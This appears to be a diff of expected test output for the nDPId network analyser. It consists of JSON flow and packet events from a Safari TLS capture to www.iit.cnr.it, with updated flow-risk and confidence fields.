-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"}
-00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01182{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
